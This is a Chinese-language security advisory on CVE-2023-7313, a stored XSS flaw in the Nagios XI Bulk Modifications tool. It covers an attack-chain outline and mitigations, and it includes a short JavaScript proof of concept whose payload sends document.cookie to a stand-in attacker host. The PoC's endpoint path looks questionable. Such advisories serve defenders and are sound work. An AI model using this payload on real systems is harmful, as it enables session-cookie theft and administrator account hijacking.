CVE-2023-7313 Nagios XI跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2023-7313

漏洞类型

XSS (跨站脚本)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2023-7313是Nagios XI软件中的一个存储型跨站脚本(XSS)漏洞，存在于批量修改(Bulk Modifications)工具中。该漏洞影响Nagios XI 5.11.3之前的所有版本。攻击者可以利用该漏洞通过在批量修改功能中注入恶意JavaScript脚本，当其他用户访问受影响页面时，恶意脚本将在受害者浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话、修改页面内容或进行钓鱼攻击。由于该漏洞需要低权限认证用户触发，且需要用户交互才能成功利用，因此CVSS评分被评定为5.4分(中危)。Nagios XI作为一款广泛使用的企业级网络和系统监控工具，其安全漏洞可能影响大量组织的IT基础设施监控能力。漏洞发现者vulncheck.com已向厂商报告此问题，厂商在后续版本中进行了修复。建议使用Nagios XI的组织尽快升级到5.11.3或更高版本以消除安全风险。

技术细节

Nagios XI的批量修改工具(Bulk Modifications Tool)存在输入验证不足的安全缺陷。攻击者在进行批量修改操作时，可以在相关参数中注入恶意JavaScript代码片段。由于应用程序未对用户输入进行充分的输出编码或转义处理，攻击者注入的脚本会被存储在服务器端。当管理员或其他用户访问包含恶意内容的页面时，浏览器会将其解析为可执行脚本并在当前页面上下文中运行。攻击者可以利用此漏洞执行以下操作：1) 通过document.cookie窃取用户会话Cookie；2) 使用XMLHttpRequest或Fetch API向外部服务器发送敏感数据；3) 在页面中注入伪造的登录表单进行钓鱼攻击；4) 修改页面DOM结构进行社工攻击。成功利用此漏洞需要攻击者拥有Nagios XI的低权限账户，并诱使其他用户访问包含恶意脚本的页面。由于攻击依赖于社会工程学技巧(如诱导用户点击链接)，实际攻击难度相对较高，但一旦成功，攻击者可以获取管理员权限完全控制Nagios XI系统。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标组织使用的Nagios XI版本，确认版本号低于5.11.3以确定漏洞存在

STEP 2

获取访问权限

攻击者获取Nagios XI的低权限账户(如普通监控用户)凭据

STEP 3

注入恶意脚本

通过批量修改工具的输入字段注入XSS payload，恶意代码被存储在服务器数据库中

STEP 4

诱导受害者访问

攻击者通过钓鱼邮件或内部消息诱导管理员或高权限用户访问包含恶意脚本的页面

STEP 5

脚本执行与数据窃取

受害者浏览器解析页面时执行注入的JavaScript，攻击者窃取会话Cookie或执行其他恶意操作

STEP 6

会话劫持与权限提升

利用窃取的会话Cookie冒充管理员身份登录，执行更高级别的恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-7313 PoC - Nagios XI XSS via Bulk Modifications Tool
// This PoC demonstrates how to inject malicious JavaScript through the Bulk Modifications feature

// Step 1: Prepare the XSS payload
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Step 2: Send the malicious request to the Bulk Modifications endpoint
fetch('https://target-nagios-xi.com/nagiosxi/includes/components/bulk modification/bulk_modification.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': 'PHPSESSID=' + attackerSessionId
    },
    body: new URLSearchParams({
        'host_name': 'victim-host' + xssPayload,
        'update': '1',
        'modus': 'host'
    })
});

// Step 3: Social engineering to make victim visit the page containing the XSS
// The injected script will execute when the page is rendered
console.log('XSS payload injected successfully');

影响范围

Nagios XI < 5.11.3

防御指南

临时缓解措施

在厂商发布正式修复版本之前，建议采取以下临时缓解措施：1) 限制批量修改功能的访问权限，仅允许可信管理员使用；2) 在Web应用防火墙(WAF)上配置XSS防护规则，过滤常见的XSS攻击向量；3) 启用HTTPOnly和Secure标志保护会话Cookie；4) 定期审计Nagios XI的访问日志，监控异常的批量操作行为；5) 对管理员进行安全意识培训，提醒不要点击来历不明的链接；6) 考虑使用虚拟补丁技术暂时阻断对该漏洞的利用。